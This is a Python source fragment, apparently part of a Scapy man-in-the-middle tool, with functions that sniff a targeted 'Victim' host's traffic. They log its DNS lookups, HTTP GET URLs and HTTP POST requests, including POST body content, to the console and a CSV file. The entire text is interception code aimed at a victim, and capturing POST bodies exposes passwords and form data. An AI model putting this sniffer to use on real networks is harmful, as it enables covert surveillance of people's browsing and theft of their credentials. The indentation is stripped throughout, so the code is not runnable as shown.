def dns_sniff_request(pkt):
# adding sourcecondition
try:
pkt.getlayer(IP).src
pkt.getlayer(Ether).src
except AttributeError:
return
if (
pkt.getlayer(IP).src == V_IP
and pkt.getlayer(Ether).src == V_MAC
and pkt.haslayer(DNS)
and pkt.getlayer(DNS).qr == 0
):
date = datetime.now().strftime("[%Y-%m-%d %H:%M:%S]")
print((
date
+ " Service: DNS"
+ " Victim: "
+ pkt.getlayer(IP).src
+ " ("
+ pkt.getlayer(Ether).src
+ ") is resolving "
+ pkt.getlayer(DNS).qd.qname
))
if not SAVE_FILE_PATH == "":
utils.save_to_csv_file(
[
date,
pkt.getlayer(IP).src,
pkt.getlayer(Ether).src,
"DNS request",
pkt.getlayer(DNS).qd.qname,
],
SAVE_FILE_PATH,
)
def http_sniff_get_request(pkt):
print("http_get_req")
if pkt.haslayer(TCP) and pkt.getlayer(TCP).dport == 80:
try:
# getting GET request and Host header
raw_content = str(pkt.getlayer(TCP))
lines = raw_content.split("\r\n")
get_request = ""
host_request = ""
for line in lines:
if "GET" in line:
get_line = line.split(" ")
for index, l in enumerate(get_line):
if "GET" in l:
get_request = get_line[index + 1]
if "Host:" in line:
host_request = line.split(" ")[1]
# checking if packet has source fields
try:
pkt.getlayer(IP).src
pkt.getlayer(Ether).src
except AttributeError:
return
# displaying content if GET request is found and if it is from Victim
if (
pkt.getlayer(IP).src == V_IP
and pkt.getlayer(Ether).src == V_MAC
and not get_request == ""
):
date = datetime.now().strftime("[%Y-%m-%d %H:%M:%S]")
print(
date
+ " Service: HTTP_GET"
+ " Victim: "
+ pkt.getlayer(IP).src
+ " ("
+ pkt.getlayer(Ether).src
+ ") is requiring document: "
+ host_request
+ get_request
)
if not SAVE_FILE_PATH == "":
utils.save_to_csv_file(
[
date,
pkt.getlayer(IP).src,
pkt.getlayer(Ether).src,
"HTTP_GET request",
host_request + get_request,
],
SAVE_FILE_PATH,
)
except IndexError:
return
def http_sniff_post_request(pkt):
print("http_post_req")
if pkt.haslayer(TCP) and pkt.getlayer(TCP).dport == 80:
try:
# getting GET request and Host header
raw_content = str(pkt.getlayer(TCP))
lines = raw_content.split("\r\n")
post_request = ""
host_request = ""
found_first_empty_line = False
post_content = ""
for index, line in enumerate(lines):
if "POST" in line:
post_line = line.split(" ")
for index1, l in enumerate(post_line):
if "POST" in l:
post_request = post_line[index1 + 1]
if "Host:" in line:
host_request = line.split(" ")[1]
if line == "" and found_first_empty_line == False:
found_first_empty_line = True
post_content = lines[index + 1]
# checking if packet has source fields
try:
pkt.getlayer(IP).src
pkt.getlayer(Ether).src
except AttributeError:
return
# displaying content if GET request is found and if it is from Victim
if (pkt.getlayer(IP).src == V_IP
and pkt.getlayer(Ether).src == V_MAC
and not post_request == ""):
date = datetime.now().strftime("[%Y-%m-%d %H:%M:%S]")
print(date + " Service: HTTP_POST" + " Victim: " +
pkt.getlayer(IP).src + " (" + pkt.getlayer(Ether).src +
")" + " is sending document: " + host_request +
post_request + " Content:" + post_content)
if not SAVE_FILE_PATH == "":
utils.save_to_csv_file(
[
date,
pkt.getlayer(IP).src,
pkt.getlayer(Ether).src,
"HTTP_POST request",
("POST location:" + host_request + post_request +
" Content:" + post_content),
],
SAVE_FILE_PATH,
)
except IndexError:
return
